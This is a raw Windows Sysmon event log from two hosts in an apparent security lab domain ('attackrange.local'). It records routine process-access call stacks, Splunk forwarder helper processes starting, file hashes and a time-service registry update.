16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245473Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245472Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245471Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245470Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245469Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245468Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245467Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245466Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245465Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-516B-6063-A722-00000000AF01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245464Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-516B-6063-A722-00000000AF01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245463Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-516B-6063-A722-00000000AF01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245462Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.453{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=465F08DF6365AB7D720653704F457A8B,SHA256=A114A5C846A68CC612176252CE44642D185B9366ED168134D09D84C51B37FFED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245461Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.328{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56325FAFED600D074AF299FC31829825,SHA256=5F5EF03D74DEDB195736BFF3BAE314D1F39BB991573473CD92AA261BCC03BC24,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245460Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.093{CB4067E1-516A-6063-A622-00000000AF01}10922792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001060833Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:22.027{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54765-false10.0.1.12-8000- 10341000x80000000000000001060832Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.858{7F8C56E7-516C-6063-1601-00000000AF01}31522532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060831Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37832D621D93402DCA9E7B0542A87239,SHA256=39EB622693FEDA6B3484B7C3F17E1226AEA2C50C0CEC9116979C26A4F7AE248B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060830Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-516C-6063-1601-00000000AF01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060829Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060828Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060827Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060826Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060825Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-516C-6063-1601-00000000AF01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060824Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.718{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-516C-6063-1601-00000000AF01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060823Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.719{7F8C56E7-516C-6063-1601-00000000AF01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000001060822Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:27:24.452{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72581-0x910189a1) 10341000x80000000000000001060821Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.155{7F8C56E7-516C-6063-1501-00000000AF01}56004596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060820Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.030{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-516C-6063-1501-00000000AF01}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060819Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.030{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060818Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 